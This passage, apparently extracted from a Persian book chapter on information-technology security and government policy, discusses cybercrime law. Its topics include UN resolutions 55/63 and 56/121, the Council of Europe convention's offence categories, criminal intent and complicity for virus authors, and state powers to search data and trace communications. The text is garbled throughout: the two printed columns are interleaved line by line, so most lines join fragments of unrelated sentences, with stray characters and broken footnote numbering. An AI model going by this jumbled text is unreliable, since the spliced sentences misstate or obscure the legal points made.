ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺨﻠﻔﺎﺗﻲ ﻛﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ،ﻳـﺎ ﺩﺭ ﺍﻃﻼﻋــﺎﺕ ٧٤ﺭﺍ ﺍﻋــﻼﻡ ﻧﻤــﻮﺩ APEC .ﺑﻤﻨﻈــﻮﺭ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ
ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻣﺨﺪﻭﺵ ﻣـﻲﻛﻨﻨـﺪ ،ﻗـﻮﺍﻧﻴﻦ ﺧـﻮﺩ ﺭﺍ CERTﻣﺤﻠــﻲ ،ﺑــﺮﺍﻱ ﺁﻣــﻮﺯﺵ ﺩﺍﺧﻠــﻲ ﻛــﺸﻮﺭﻫﺎ ﻭ ﺗﻮﺳــﻌﻪ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﺔ ﻣﻨﻄﻘـﻪ
75 Information Sharing and Analysis Center
76 Warning, Advice & Reporting Point 72 Security Patches
77 National Security Telecommunication 73 Computer Emergency Response Team
Advisory Committee 74 Network And Information Security Agency
٢٤٧ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ ،ﻳﺎ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﻳﺪ .ﭼﺎﺭﭼﻮﺏ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻣﺘﺸﻜﻞ ﺍﺯ ﻗﻮﺍﻧﻴﻦ
ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﻭ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷـﻮﻧﺪ ،ﻳـﺎ ﺑـﻪ ﻳـﻚ ﻣﻮﺿﻮﻋﻪ ٧٨ﻭ ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨـﺪ ٧٩ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﺣـﺮﻳﻢ
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻔــﻮﺫ ﻛــﺮﺩﻩ ﻭ ﺷــﻜﻞ ﻇــﺎﻫﺮﻱ ﺁﻥ ﺭﺍ ﺗﻐﻴﻴــﺮ ﺧﺼﻮﺻﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻛﺎﺭﺑﺮﺩ ﺍﺧﺘـﺼﺎﺻﻲ ﺩﺍﺭﺩ ﻭ
ﻣﻲ ﺩﻫﻨﺪ ،ﻫﻤﻪ ﺟـﺰﺀ ﺍﻳـﻦ ﺩﺳـﺘﻪ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﻧﺪ. ﻧﻴﺰ ﺍﺯ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻴﺪﺍﻧﻲ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﺩ.
ﺷﻨﺎﺳﺎﻳﻲ ﻋﻨﺼﺮ "ﻗـﺼﺪ" ﺑـﺮﺍﻱ ﺗﻤـﺎﻳﺰ ﻣﻴـﺎﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﺷﺎﻳﺪ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺑﺎﺷـﺪ
ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺻﺮﻓﹰﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻌﻤﻮﻝ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﺗﺼﺎﺩﻓﻲ
ﻛﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩ ﺍﺳـﺖ .ﻣﺠﻤـﻊ
ﻭﻳﺮﻭﺳﻬﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ. ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﻣﻠــﻞ ﺩﺭ ﺩﺳــﺎﻣﺒﺮ ۲۰۰۰ﻭ ﮊﺍﻧﻮﻳــﻪ ۲۰۰۲
ﺗﺪﺍﺧﻞ ﺳﻴﺴﺘﻢ :٨٢ﺟﻠﻮﮔﻴﺮﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺳﻴـﺴﺘﻢ • ﻗﻄﻌﻨﺎﻣــﻪﻫــﺎﻱ ۵۵/۶۳ﻭ ۵۶/۱۲۱ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﻣﺒــﺎﺭﺯﻩ ﺑــﺎ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺼﻮﺭﺕ ﺗﻌﻤــﺪﻱ ﺍﺯ ﻃﺮﻳــﻖ ﻭﺭﻭﺩ ،ﺍﻧﺘﻘــﺎﻝ، ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﺑـﻪ ﺗـﺼﻮﻳﺐ
ﺗﺨﺮﻳﺐ ،ﺣﺬﻑ ،ﻳﺎ ﺗﻐﻴﻴـﺮ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ .ﺍﻳـﻦ ﺑﻨـﺪ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﻗﻄﻌﻨﺎﻣﺔ ۵۵/۶۳ﺑﻴﺎﻥ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ
ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺍﺯ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻳﺎ ﻭﺭﻭﺩ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻥ ﭘﻨﺎﻫﮕـﺎﻩ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ ﻣﺮﺗﻜـﺐ ﺟـﺮﺍﺋﻢ
ﻭﻳﺮﻭﺱ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛـﺎﺭﻛﺮﺩ ﻃﺒﻴﻌـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ .ﻋـﻼﻭﻩ ﺑـﺮ
ﺁﻥ ﺗﺪﺍﺧﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺷﻮﺩ" .ﺁﺳﻴﺐ ﺟﺪﻱ" ﻋﻨـﺼﺮﻱ ﺍﻳﻦ ﻗﻄﻌﻨﺎﻣﺔ ۵۵/۶۳ﻋﻨﻮﺍﻥ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﺟﻬـﺖ
ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺭﺍ ﺍﺯ ﺭﻓﺘﺎﺭﻫـﺎﻱ ﻣﻌﻤـﻮﻟﻲ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )ﺑـﺎ
ﻲ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺜﻞ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ ﻫﻤﻜﺎﺭﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺒـﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ(
ﻧﺎﺧﻮﺍﺳﺘﻪ ﻣﺠﺰﺍ ﻣﻲﺳﺎﺯﺩ. ﺍﻗﺪﺍﻣﺎﺕ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ .ﭘﻴـﺸﻨﻬﺎﺩ ﻗﻄﻌﻨﺎﻣـﺔ ۵۵/۶۳ﻧﻴـﺰ
ﺁﻣﻮﺯﺵ ﻗﻮﺍﻧﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ.
ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ :٨٣ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﻪ •
ﺳﻴــﺴﺘﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺷﺨــﺼﻲ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻱ
ﺳﺮﭘﻴﭽﻲ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿﻮﻋﺔ ﺟﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻣﺘﺮﺍﺩﻑ "ﺗﻌﺪﻱ" ﺩﺍﻧﺴﺖ) .ﺍﺯ ﻳﻚ
ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﻣﺘـﺼﻮﺭ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻣﺘﻨﺎﺳﺐ ،ﺟﺮﺍﺋ ﹺﻢ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺑـﺪﺗﺮ ﺍﺯ ﺟـﺮﺍﺋﻢ ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ
ﻣﺸﺎﺑﻪ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺟﻠﻮﻩ ﺩﻫﻨﺪ. ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ ،ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ
ﻛﺎﺭﺑﺮﺩ ﻣﻔﺎﻫﻴﻢ ﭘﺎﻳﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺟﺰﺍ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ
ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻔﺎﻫﻴﻢ ﻣﻌﻤﻮﻝ ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ
ﻣﺎﻧﻨـﺪ "ﻣﻌﺎﻭﻧــﺖ ﺩﺭ ﺟــﺮﻡ" ﻳــﺎ "ﻗـﺼﺪ" ﺭﺍ ﻧﻴــﺰ ﺩﺭ ﺣــﻮﺯﺓ ﺟــﺮﺍﺋﻢ ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ
ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻗـﺎﻧﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺟﺮﺍﺋﻢ ﻋﺎﺩﻱ ﻣﻔﻬﻮﻡ "ﻗﺼﺪ ﺗﺨﻠﻒ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ،ﺩﺭ ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ ،٨٤ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ cookieﻫـﺎ ﻳـﺎ
ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻫﻤﺎﻥ ﻣﻔﻬﻮﻡ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ. botﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﻗﺼﺪ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ
ﺟﺮﺍﺋﻢ ﺗﺴﻬﻴﻞﺷﺪﻩ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺟﺮﻡ" ﻭ ﻳﺎ "ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﺟﺮﻡ" ﻣﻄـﺮﺡ
ﺷﻮﺩ؛ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﻳﺮﻭﺱ ﺑـﻪ ﺩﺭﺳـﺘﻲ ﻋﻤـﻞ ﻧﻜﻨـﺪ .ﺑـﻪ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻪﺗﻨﻬﺎ ﺷﺎﻣﻞ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩ ﻣﺘﺨﻠـﻒ
ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻔﻬﻮﻡ "ﻣﻌﺎﻭﻧـﺖ ﺩﺭ ﺟـﺮﻡ" ﺭﺍ ﺑﺮ ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ،ﺑﻠﻜﻪ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺗﻌﺮﻳﻒ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ،ﺩﺭ ﺣﻮﺯﻩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑـﺮ ﻣـﻲﮔﻴـﺮﺩ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ
ﻼ ﺍﮔـﺮ ﻛـﺴﻲ ﻫﻤﺎﻥ ﺗﻌﺎﺭﻳﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ ،ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﺜ ﹰ ﺳﺮﻗﺖ ﻭ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺟﺮﺍﺋﻤﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ
ﺑﺼﻮﺭﺕ ﻋﻤﺪﻱ ﻳﻚ ﻭﻳﺮﻭﺱ ﺗﻮﻟﻴﺪ ﻛﻨـﺪ ،ﺣﺘـﻲ ﺍﮔـﺮ ﻭﻳـﺮﻭﺱ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺗﻤﺎﻣﻲ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺗﻮﺳﻂ ﺷﺨﺺ ﺩﻳﮕـﺮﻱ ﺑـﻪ ﺷـﺒﻜﻪ ﺭﺍﻩ ﻳﺎﻓﺘـﻪ ﺑﺎﺷـﺪ ،ﺑـﺎﺯ ﻫـﻢ ﺍﻣــﺎ ﺳــﺮﻗﺖ ﻭ ﻛﻼﻫﺒــﺮﺩﺍﺭﻱ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﺻــﻮﺭﺕ
ﺷﺨﺺ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ ﺩﺭ ﻗﺒـﺎﻝ ﺧﺮﺍﺑﻴﻬـﺎﻳﻲ ﻛـﻪ ﺁﻥ ﻭﻳـﺮﻭﺱ ﺩﺭ ﻣﻲﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺗﺨﻠﻔﺎﺗﻲ ﻫﻤﭽﻮﻥ ﺳﺮﻗﺘﻬﺎﻱ ﺍﺩﺑـﻲ ﻭ
ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ. ﻓﻜﺮﻱ ﻳﺎ ﺍﻧﺘﺸﺎﺭ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺑﻪ ﺟﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻤﻲﺷﻮﻧﺪ ،ﺑﻠﻜﻪ ﺗﺨﻠﻔﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ،ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﺟـﺮﺍﺋﻢ
ﺗﻮﺟﻪ ﺑﻪ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﺎﻟﺒﹰﺎ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﺆﺍﻻﺗﻲ ﻣﻮﺟﻮﺩ ،ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺗﺤﻠﻴـﻞ ﺩﻗﻴـﻖ
ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﻭﻟﺖ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻧﻬـﺎ ﺣـﻖ ﻣﻲﺷﻮﺩ ،ﻣﺜ ﹰ ﻋﻮﺍﻣﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻨﮕﻮﻧﻪ ﺟﺮﺍﺋﻢ ﻣﺴﺘﻠﺰﻡ ﺑﺮﺭﺳﻲ ﺗﻄﺒﻴﻘﻲ ﻗـﻮﺍﻧﻴﻦ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘﻴـﺪﺍ ﺟﻨﺎﻳﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ،ﻭ ﺩﺭ ﺍﻳـﻦ
ﻣﻲﻛﻨﺪ -ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﻮﺍﻫﺪﻱ ﺑـﺮ ﺍﻧﺠـﺎﻡ ﺟـﺮﺍﺋﻢ ﺭﺍﺳﺘﺎ ﻗﺎﺋﻞ ﺷﺪﻥ ﺗﻔﺎﻭﺕ ﻣﻴﺎﻥ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺟﺮﺍﺋﻤﻲ ﻛـﻪ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺗﺨﻠﻔﺎﺕ ﺑﺎﺷﻨﺪ -ﻛﺪﺍﻣﻨﺪ؟ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ.
ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺩﻭﻟـﺖ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑﻨﺪﻫﺎﻱ ۷ﺗﺎ ۱۰ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺍﺯ ﺍﻳـﻦ ﻣﻔﻬـﻮﻡ ﻓﺎﺻـﻠﻪ
ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨـﺪ .ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﻣﻲﮔﻴﺮﺩ ﻭ ﺑﺼﻮﺭﺕ ﻛﻠﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻤﻲ ﺻـﺤﺒﺖ ﻣـﻲﻛﻨـﺪ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺳــﺘﻮﺭﺍﺕ ﻗــﻀﺎﻳﻲ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﺩﺍﺩﻩﻫــﺎﻱ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺴﻬﻴﻞ ﺍﻧﺠﺎﻡ ﺁﻧﭽﻪ ﻛﻪ ﺧـﺎﺭﺝ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﻳﺎ ﺣﻜﻢ ﺗﺼﺮﻑ ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺯ ﻓﻀﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺟﺮﻡ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ ﻣـﻲﭘـﺮﺩﺍﺯﺩ )ﻛﺎﺭﻫـﺎﻳﻲ
ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺍﺟـﺎﺯﻩ ﭼﻮﻥ ﺟﻌﻞ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺗﻮﺯﻳﻊ ،ﺗﻮﻟﻴﺪ ﻳﺎ ﺩﺍﺷﺘﻦ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ
ﺭﺩﻳــﺎﺑﻲ ﺑﻼﺩﺭﻧــﮓ ٨٥ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ ﺍﻧﺘﻘــﺎﻟﻲ ﺭﺍ -ﻛــﻪ ﻭ ﻧﻘﺾ ﺣﻘﻮﻕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﻳﻚ ﺍﺛﺮ( .ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻲ ﻧﻈﺎﻣﻬﺎﻱ
ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ -ﻣـﻲﺩﻫﻨـﺪ .ﺑﺨـﺶ ﺣﻘﻮﻗﻲ ،ﺑﻜﺎﺭﮔﻴﺮﻱ ﺿﻮﺍﺑﻂ ﺧﺎﺹ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻤـﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ
